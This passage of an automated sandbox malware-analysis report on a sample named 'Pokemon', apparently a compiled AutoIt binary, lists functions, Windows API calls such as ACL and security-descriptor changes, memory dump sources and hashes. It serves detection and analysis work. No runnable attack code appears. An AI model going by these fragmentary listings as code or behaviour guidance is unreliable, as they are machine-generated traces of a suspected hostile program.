                                                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00127BF8
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 00127C00
                                                                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00127C07
                                                                                                                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00127C16
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00127C1D
                                                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00127C68
                                                                                                                                                                                                                                                                                      • FillRect.USER32(?,?,?), ref: 00127C9A
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00127CBC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetSysColor.USER32(00000012), ref: 00127E5B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: SetTextColor.GDI32(?,00127B2D), ref: 00127E5F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetSysColorBrush.USER32(0000000F), ref: 00127E75
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetSysColor.USER32(0000000F), ref: 00127E80
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetSysColor.USER32(00000011), ref: 00127E9D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00127EAB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: SelectObject.GDI32(?,00000000), ref: 00127EBC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: SetBkColor.GDI32(?,?), ref: 00127EC5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: SelectObject.GDI32(?,?), ref: 00127ED2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00127EF1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00127F08
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetWindowLongW.USER32(?,000000F0), ref: 00127F15
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ae4ad250b2f1f7fdfdd4e0c5fd08f55237b221d4c74f005e24ec2cc158432c50
                                                                                                                                                                                                                                                                                      • Instruction ID: 79551cea18c4fdad8827619223a273e3bda1b824031b53f3369f7f2725a9ca45
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae4ad250b2f1f7fdfdd4e0c5fd08f55237b221d4c74f005e24ec2cc158432c50
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DA1C272008311BFCB219F64EC48E6BBBB9FF48320F100A19F962965E0D775D9A6CB51
                                                                                                                                                                                                                                                                                      Function 00091625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?), ref: 000916B4
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 000D2B07
                                                                                                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000D2B40
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000D2F85
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00091488,?,00000000,?,?,?,?,0009145A,00000000,?), ref: 00091865
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 000D2FC1
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000D2FD8
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 000D2FEE
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 000D2FF9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 9617504f2b6e3b9f84111da1e3846cc56fc6c1ba96ed0bf741b3ec51a43657e7
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d2e1a708b70134050402d8de24ab6381c8244467b7600ddc5cdb33259da3cfa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9617504f2b6e3b9f84111da1e3846cc56fc6c1ba96ed0bf741b3ec51a43657e7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C12E930608312AFCB65CF14D894BA9BBF1FB94304F18452AF495DB662C771AC92DFA1
                                                                                                                                                                                                                                                                                      Function 0011316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0011319B
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001132C7
                                                                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00113306
                                                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00113316
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0011335D
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00113369
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001133B2
                                                                                                                                                                                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001133C1
                                                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 001133D1
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 001133D5
                                                                                                                                                                                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001133E5
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001133EE
                                                                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 001133F7
                                                                                                                                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00113423
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0011343A
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0011347A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0011348E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0011349F
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001134D4
                                                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 001134DF
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001134EA
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001134F4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                      • Opcode ID: 02e814aee4ca0b4b401133670aee99f545136ae59be56a0285640a74dc3f5c12
                                                                                                                                                                                                                                                                                      • Instruction ID: 4a46ad4f7378addbdd2c700badcc63163e597be04eb33befe8a027e8a7b4eaa8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02e814aee4ca0b4b401133670aee99f545136ae59be56a0285640a74dc3f5c12
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20B14E71A00215BFEB14DFA8DC49FAE7BB9EB08710F108114F915E7291DBB4AD91CB54
                                                                                                                                                                                                                                                                                      Function 00105524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00105532
                                                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,0012DC30,?,\\.\,0012DCD0), ref: 0010560F
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,0012DC30,?,\\.\,0012DCD0), ref: 0010577B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                      • Opcode ID: 89d9403344b7dff5d6eac75e350e2fbaec22dbafa9554101fa5e5b918ce89cea
                                                                                                                                                                                                                                                                                      • Instruction ID: 2ee3c304b8e41c78b3570ed117e3f8a2feaf844b49447ec3484ee6a55c7d570b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89d9403344b7dff5d6eac75e350e2fbaec22dbafa9554101fa5e5b918ce89cea
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9610330A04905EBCB28DF64D9939BA73B3EF04311BA08015E896AF2D2C7B2DD45EF51
                                                                                                                                                                                                                                                                                      Function 00121A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00121BC4
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00121BD9
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00121BE0
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00121C35
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00121C55
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00121C89
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00121CA7
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00121CB9
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00121CCE
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00121CE1
                                                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 00121D3D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00121D58
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00121D6C
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00121D84
                                                                                                                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00121DAA
                                                                                                                                                                                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00121DC4
                                                                                                                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00121DDB
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00121E46
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                      • Opcode ID: a5052c77a6aa13f748302325aecebabaec774f1a4f17e1ceeedb34c4c99664d0
                                                                                                                                                                                                                                                                                      • Instruction ID: f3612450f0736e0991577340e8db945ddb6edd5b4917838fbda23ae63a4a1cb1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5052c77a6aa13f748302325aecebabaec774f1a4f17e1ceeedb34c4c99664d0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEB1CE71604311AFDB14DF64D888BAABBE5FF94310F00891CF9999B2A2C731EC55CB92
                                                                                                                                                                                                                                                                                      Function 00120CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00120D81
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00120DBB
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00120E25
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00120E8D
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00120F11
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00120F61
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00120FA0
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AFD52: _wcslen.LIBCMT ref: 000AFD5D
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000F2BA5
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000F2BD7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                      • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                      • Opcode ID: 1d1cce7e10e862ca555cc06a5829e851222cf7541f5b630764b70aa2053b1a9d
                                                                                                                                                                                                                                                                                      • Instruction ID: d6a556550246a1f21781aa4444c2f4060b4b300d838726d2f56dd2864f031004
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d1cce7e10e862ca555cc06a5829e851222cf7541f5b630764b70aa2053b1a9d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09E1FF312082519FCB18DF24D9518BAB3E2FF99314B154A6CF896AB3A3DB30ED55CB41
                                                                                                                                                                                                                                                                                      Function 00092521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000925F8
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00092600
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009262B
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00092633
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00092658
                                                                                                                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00092675
                                                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00092685
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000926B8
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000926CC
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 000926EA
                                                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00092706
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00092711
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetCursorPos.USER32(?), ref: 000919E1
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: ScreenToClient.USER32(00000000,?), ref: 000919FE
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetAsyncKeyState.USER32(00000001), ref: 00091A23
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetAsyncKeyState.USER32(00000002), ref: 00091A3D
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,0009199C), ref: 00092738
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                      • Opcode ID: 5290e87d098e7bbb53aff83ea023adf026136e3e8f5bafd578428fe567efe909
                                                                                                                                                                                                                                                                                      • Instruction ID: 3350d722afdd935765b525084c8a58622dbfce75feffb11c9f97afb31ec57fd6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5290e87d098e7bbb53aff83ea023adf026136e3e8f5bafd578428fe567efe909
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCB16B31A00209AFDF24DFA8DC55BAE7BB4FB48314F104229FA15A7290DB74E951DF61
                                                                                                                                                                                                                                                                                      Function 000F16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1A60
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A82
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F1A99
                                                                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000F1741
                                                                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000F1775
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 000F178C
                                                                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 000F17C6
                                                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000F17E2
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 000F17F9
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 000F1801
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000F1808
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000F1829
                                                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 000F1830
                                                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000F185F
                                                                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000F1881
                                                                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000F1893
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F18BA
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F18C1
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F18CA
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F18D1
